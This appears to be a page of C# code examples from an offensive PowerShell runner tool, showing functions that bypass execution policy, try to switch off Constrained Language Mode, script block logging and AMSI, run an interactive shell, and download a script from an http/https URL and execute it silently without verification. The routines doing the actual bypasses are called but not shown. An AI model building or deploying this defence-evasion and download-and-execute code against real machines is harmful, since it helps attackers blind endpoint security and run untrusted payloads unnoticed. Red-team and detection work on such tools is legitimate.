Пример #1
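        /// <summary>
        /// Runs an optional script file followed by a single command inside a freshly
        /// created PowerShell runspace and returns the combined, trimmed output.
        /// </summary>
        /// <param name="scriptPath">Path of a script to dot-source first; an empty string skips that step.</param>
        /// <param name="command">Command text handed to ExecuteCommand after the script.</param>
        /// <returns>Concatenated output of the script and the command with surrounding whitespace removed.</returns>
        private static string Execute(string scriptPath, string command)
        {
            string       output = "";
            CustomPSHost host   = new CustomPSHost();
            var          state  = InitialSessionState.CreateDefault();

            state.ApartmentState       = System.Threading.ApartmentState.STA;
            state.AuthorizationManager = null;                  // Bypasses PowerShell execution policy (for this runspace only)
            state.ThreadOptions        = PSThreadOptions.UseCurrentThread;

            using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state))
            {
                runspace.ApartmentState = System.Threading.ApartmentState.STA;
                runspace.ThreadOptions  = PSThreadOptions.UseCurrentThread;

                runspace.Open();

                using (var ps = PowerShell.Create())
                {
                    ps.Runspace = runspace;

                    bool defensesDisabled = DisableDefenses(ps, host);
                    if (!defensesDisabled)
                    {
                        Info("[-] Could not disable all of the Powershell defenses.");
                        if (!ProgramOptions.Force)
                        {
                            Info("[-] Bailing out...");
                        }
                    }

                    // Fix: "Bailing out..." used to fall through and run the script and the
                    // command anyway. Execution now proceeds only when DisableDefenses
                    // succeeded or the user explicitly forced it (mirrors Parashell).
                    if (defensesDisabled || ProgramOptions.Force)
                    {
                        if (scriptPath.Length > 0)
                        {
                            string scriptContents = GetFileContents(scriptPath);

                            Info($"PS> . '{scriptPath}'");
                            output += ExecuteCommand(scriptContents, ps, host, false, false, false);

                            // Dropping these references is best-effort only: it does not
                            // guarantee the script text is gone from process memory.
                            scriptContents            = "";
                            scriptPath                = "";
                            ProgramOptions.ScriptPath = "";
                        }

                        output += ExecuteCommand(command, ps, host, !ProgramOptions.CmdEncoded);
                        command = "";
                    }

                    if (!ProgramOptions.Nocleanup && CleanupNeeded)
                    {
                        DisableClm.Cleanup(ps, host, ProgramOptions.Verbose);
                    }
                    System.GC.Collect();
                }

                runspace.Close();
            }

            return output.Trim();
        }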
Пример #2
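        /// <summary>
        /// Interactive read-eval-print loop: prompts with the runspace's current directory,
        /// runs each line the user types, and stops on EOF (null), an empty line, "exit" or "quit".
        /// </summary>
        private static void Parashell()
        {
            CustomPSHost host  = new CustomPSHost();
            var          state = InitialSessionState.CreateDefault();

            state.AuthorizationManager = null;                  // Bypasses PowerShell execution policy (for this runspace only)

            using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state))
            {
                runspace.Open();

                using (var ps = PowerShell.Create())
                {
                    ps.Runspace = runspace;
                    if (!DisableDefenses(ps, host))
                    {
                        Info("[-] Could not disable all of the Powershell defenses.");
                        if (!ProgramOptions.Force)
                        {
                            Info("[-] Bailing out...");
                            return;
                        }
                    }

                    while (true)
                    {
                        string pwd    = ExecuteCommand("(Resolve-Path .\\).Path", ps, host, true, true).Trim();
                        string prompt = $"{GLOBAL_PROMPT_PREFIX} {pwd}> ";
                        string input  = Input(prompt);

                        // Fix: the exit test used to run *after* the line had been executed, so a
                        // null line (EOF) reached ExecuteCommand and "exit"/"quit" were handed to
                        // PowerShell before the loop ended. Ordinal comparison keeps the keyword
                        // check independent of the current culture.
                        if (input == null || input.Length == 0 ||
                            String.Equals(input, "exit", StringComparison.OrdinalIgnoreCase) ||
                            String.Equals(input, "quit", StringComparison.OrdinalIgnoreCase))
                        {
                            break;
                        }

                        string output = ExecuteCommand(input, ps, host, true);
                        Console.WriteLine(output);
                    }

                    if (!ProgramOptions.Nocleanup && CleanupNeeded)
                    {
                        DisableClm.Cleanup(ps, host, ProgramOptions.Verbose);
                    }
                }

                runspace.Close();
            }
        }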
Пример #3
        /// <summary>
        /// Attempts, in order, to turn off Constrained Language Mode, script block logging
        /// and AMSI in the supplied PowerShell instance, printing the outcome of each step.
        /// Every step is attempted even when an earlier one failed.
        /// </summary>
        /// <param name="rs">PowerShell instance bound to the target runspace.</param>
        /// <param name="host">Custom host that receives the runspace output.</param>
        /// <returns>True only when all three steps reported success.</returns>
        private static bool DisableDefenses(PowerShell rs, CustomPSHost host)
        {
            bool clmDisabled = DisableClm.DoDisable(rs);

            string languageMode = ExecuteCommand("$ExecutionContext.SessionState.LanguageMode", rs, host, true);
            Info($"[.] Language Mode: {languageMode}");

            bool fullLanguage = String.Equals(languageMode, "FullLanguage", StringComparison.CurrentCultureIgnoreCase);
            Info(clmDisabled && fullLanguage
                 ? "[+] Constrained Language Mode Disabled."
                 : "[-] Constrained Language Mode not disabled.");

            // Each step is invoked unconditionally; the flags are combined afterwards so
            // that one failure never skips the remaining attempts (same as the `&=` chain
            // this replaces). Note the reported status is cumulative, not per step.
            bool loggingDisabled = DisableScriptLogging(rs);
            bool allSoFar        = clmDisabled && loggingDisabled;
            Info(allSoFar ? "[+] Script Block Logging Disabled." : "[-] Script Block Logging not disabled.");

            bool amsiDisabled = DisableAmsi(rs);
            bool allDisabled  = allSoFar && amsiDisabled;
            Info(allDisabled ? "[+] AMSI Disabled." : "[-] AMSI not disabled.");

            return allDisabled;
        }
Пример #4
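        /// <summary>
        /// Entry point: handles the help switches, parses options, then either starts the
        /// interactive shell or runs the given script/command once, cleaning up afterwards.
        /// </summary>
        /// <param name="args">Command-line arguments; see <see cref="Usage"/>.</param>
        static void Main(string[] args)
        {
            if (args.Length >= 1 && IsHelpSwitch(args[0]))
            {
                Usage();
                return;
            }

            try
            {
                ProgramOptions = ParseOptions(args);
            }
            catch (ArgumentException e)
            {
                Console.WriteLine($"[-] Cannot parse arguments: {e.Message}");
                Usage();
                return;
            }

            if (ProgramOptions.Verbose)
            {
                PrintBanner();
            }

            if (ProgramOptions.ScriptPath.Length > 0)
            {
                Info($"[.] Will load script file: '{ProgramOptions.ScriptPath}'");
            }

            if (ProgramOptions.XorKey != 0)
            {
                Info($"[.] Using decoding key: {ProgramOptions.XorKey}");
            }

            try
            {
                // Fix: an AppDomain named "sandbox" was created here but never used or
                // unloaded (and AppDomain.CreateDomain is unsupported on .NET Core), so it
                // has been dropped.
                if (ProgramOptions.Parashell)
                {
                    // Swallow Ctrl-C so it interrupts the current line instead of the process.
                    Console.CancelKeyPress += (object sender, ConsoleCancelEventArgs e) =>
                    {
                        if (e.SpecialKey == ConsoleSpecialKey.ControlC)
                        {
                            e.Cancel = true;
                            Console.WriteLine("^C");
                        }
                    };

                    Parashell();
                }
                else
                {
                    string output = Execute(ProgramOptions.ScriptPath, ProgramOptions.Command);
                    if (output.Length > 0)
                    {
                        Console.WriteLine("\n" + output);
                    }
                }

                // Presumably meant to release runspace resources before cleanup; a forced
                // collection is not required for correctness — TODO confirm intent.
                GC.Collect();
                GC.WaitForPendingFinalizers();
                GC.Collect();

                if (!ProgramOptions.Nocleanup && CleanupNeeded)
                {
                    DisableClm.Cleanup(null, null, ProgramOptions.Verbose);
                }
            }
            catch (Exception e)
            {
                Console.WriteLine($"[!] That's embarassing. Unhandled exception occured:\n{e}");
            }
        }

        /// <summary>
        /// True when <paramref name="arg"/> is one of the recognised help switches
        /// (--help, /h, /?, -h), compared ordinally and case-insensitively.
        /// </summary>
        private static bool IsHelpSwitch(string arg)
        {
            string[] switches = { "--help", "/h", "/?", "-h" };
            foreach (string sw in switches)
            {
                if (String.Equals(arg, sw, StringComparison.OrdinalIgnoreCase))
                {
                    return true;
                }
            }
            return false;
        }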
Пример #5
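        /// <summary>
        /// Runs an optional script (local file or http/https URL) followed by a single command
        /// inside a freshly created PowerShell runspace and returns the combined, trimmed output.
        /// </summary>
        /// <param name="scriptPath">Local path or http/https URL of a script to run first; an empty string skips that step.</param>
        /// <param name="command">Command text handed to ExecuteCommand after the script.</param>
        /// <returns>Concatenated output of the script and the command with surrounding whitespace removed.</returns>
        private static string Execute(string scriptPath, string command)
        {
            string       output = "";
            CustomPSHost host   = new CustomPSHost();
            var          state  = InitialSessionState.CreateDefault();

            state.ApartmentState       = System.Threading.ApartmentState.STA;
            state.AuthorizationManager = null;                  // Bypasses PowerShell execution policy (for this runspace only)
            state.ThreadOptions        = PSThreadOptions.UseCurrentThread;

            using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state))
            {
                runspace.ApartmentState = System.Threading.ApartmentState.STA;
                runspace.ThreadOptions  = PSThreadOptions.UseCurrentThread;

                runspace.Open();

                using (var ps = PowerShell.Create())
                {
                    ps.Runspace = runspace;

                    bool defensesDisabled = DisableDefenses(ps, host);
                    if (!defensesDisabled)
                    {
                        Info("[-] Could not disable all of the Powershell defenses.");
                        if (!ProgramOptions.Force)
                        {
                            Info("[-] Bailing out...");
                        }
                    }

                    // Fix: "Bailing out..." used to fall through and run everything anyway.
                    // Execution now proceeds only when DisableDefenses succeeded or the user
                    // explicitly forced it (mirrors Parashell).
                    if (defensesDisabled || ProgramOptions.Force)
                    {
                        if (scriptPath.Length > 0)
                        {
                            bool   silent;
                            string scriptContents = LoadScript(scriptPath, out silent);

                            if (scriptContents.Length > 0)
                            {
                                output += ExecuteCommand(scriptContents, ps, host, false, silent, false);
                            }

                            // Dropping these references is best-effort only: it does not
                            // guarantee the script text is gone from process memory.
                            scriptContents            = "";
                            scriptPath                = "";
                            ProgramOptions.ScriptPath = "";
                        }

                        output += ExecuteCommand(command, ps, host, !ProgramOptions.CmdEncoded);
                        command = "";
                    }

                    if (!ProgramOptions.Nocleanup && CleanupNeeded)
                    {
                        DisableClm.Cleanup(ps, host, ProgramOptions.Verbose);
                    }
                    System.GC.Collect();
                }

                runspace.Close();
            }

            return output.Trim();
        }

        /// <summary>
        /// Reads script text from a local file or downloads it from an http/https URL.
        /// Failures are logged and yield an empty string so the caller simply skips execution.
        /// </summary>
        /// <param name="scriptPath">Local path or URL (scheme compared case-insensitively).</param>
        /// <param name="silent">Set to true only for a successfully downloaded script, matching the
        /// original behaviour of passing silent=true to ExecuteCommand in that case.</param>
        /// <returns>The script contents, or an empty string when they could not be obtained.</returns>
        private static string LoadScript(string scriptPath, out bool silent)
        {
            silent = false;
            try
            {
                if (scriptPath.StartsWith("http://", StringComparison.OrdinalIgnoreCase) ||
                    scriptPath.StartsWith("https://", StringComparison.OrdinalIgnoreCase))
                {
                    string downloaded;
                    // Remote content is executed exactly as fetched: nothing here verifies its
                    // integrity or origin, and plain http:// offers no protection in transit.
                    using (var wc = new System.Net.WebClient())
                    {
                        downloaded = wc.DownloadString(scriptPath);
                    }

                    silent = true;
                    Info($"Executing downloaded script file: {scriptPath}");
                    return downloaded;
                }

                if (!File.Exists(scriptPath))
                {
                    // Specific exception type instead of bare Exception; the message is unchanged.
                    throw new FileNotFoundException($"Script file does not exist.Will not load it: '{scriptPath}'", scriptPath);
                }

                string fileContents = GetFileContents(scriptPath);
                Info($"PS> . '{scriptPath}'");
                return fileContents;
            }
            catch (Exception e)
            {
                Info($"Could not fetch script file/URL contents. Exception: {e}");
                return "";
            }
        }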
Пример #6
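        /// <summary>
        /// Reads the PowerShell version and language mode of the runspace behind <paramref name="rs"/>,
        /// then attempts in turn to turn off Constrained Language Mode, script block logging and AMSI,
        /// logging the outcome of each step. Every step is attempted regardless of earlier failures.
        /// </summary>
        /// <param name="rs">PowerShell instance bound to the target runspace.</param>
        /// <param name="host">Custom host that receives the runspace output.</param>
        /// <returns>True when every attempted step reported success, or when nothing was attempted
        /// because the version is below 5 and --force is not set.</returns>
        private static bool DisableDefenses(PowerShell rs, CustomPSHost host)
        {
            bool ret = true;

            string l         = ExecuteCommand("'{0}.{1}' -f $PSVersionTable.PSVersion.Major, $PSVersionTable.PSVersion.Minor", rs, host, true, true).Trim();
            float  psversion = 5;

            try
            {
                // Fix: this used to clone and replace the calling thread's CurrentCulture just to
                // force a "." decimal separator, and that change persisted for the rest of the
                // thread's life. InvariantCulture on the parse (and on the print below) is enough.
                psversion = float.Parse(l, System.Globalization.CultureInfo.InvariantCulture);
            }
            catch (FormatException e)
            {
                Info($"[-] Could not obtain Powershell's version. Assuming 5.0 (exception: {e}");
            }

            if (psversion < 5.0 && !ProgramOptions.Force)
            {
                Info("[+] Powershell version is below 5, so AMSI, CLM, SBL are not available anyway :-)");
                Info("Skipping bypass procedures...");
                return ret;
            }

            Info($"[.] Powershell's version: {psversion.ToString(System.Globalization.CultureInfo.InvariantCulture)}");

            l = ExecuteCommand("$ExecutionContext.SessionState.LanguageMode", rs, host, true, true).Trim();
            Info($"[.] Language Mode: {l}");

            if (String.Equals(l, "FullLanguage", StringComparison.CurrentCultureIgnoreCase))
            {
                Info("[+] No need to disable Constrained Language Mode. Already in FullLanguage.");
            }
            else
            {
                DisableClm.DoDisable(rs, host, ProgramOptions.Verbose);
                CleanupNeeded = true;   // callers run DisableClm.Cleanup later when this is set

                l = ExecuteCommand("$ExecutionContext.SessionState.LanguageMode", rs, host, true, true).Trim();
                Info($"[.] Language Mode after attempting to disable CLM: {l}");

                bool clmDisabled = String.Equals(l, "FullLanguage", StringComparison.CurrentCultureIgnoreCase);
                Info(clmDisabled ? "[+] Constrained Language Mode Disabled." : "[-] Constrained Language Mode not disabled.");
                ret &= clmDisabled;     // replaces the former `ret &= true` / `ret &= false` pair
            }

            // `&=` is deliberately non-short-circuiting: each step runs even after a failure,
            // and the status printed for it is cumulative rather than per step.
            if ((ret &= DisableScriptLogging(rs)))
            {
                Info("[+] Script Block Logging Disabled.");
            }
            else
            {
                Info("[-] Script Block Logging not disabled.");
            }

            if ((ret &= DisableAmsi(rs)))
            {
                Info("[+] AMSI Disabled.");
            }
            else
            {
                Info("[-] AMSI not disabled.");
            }

            Info("");

            return ret;
        }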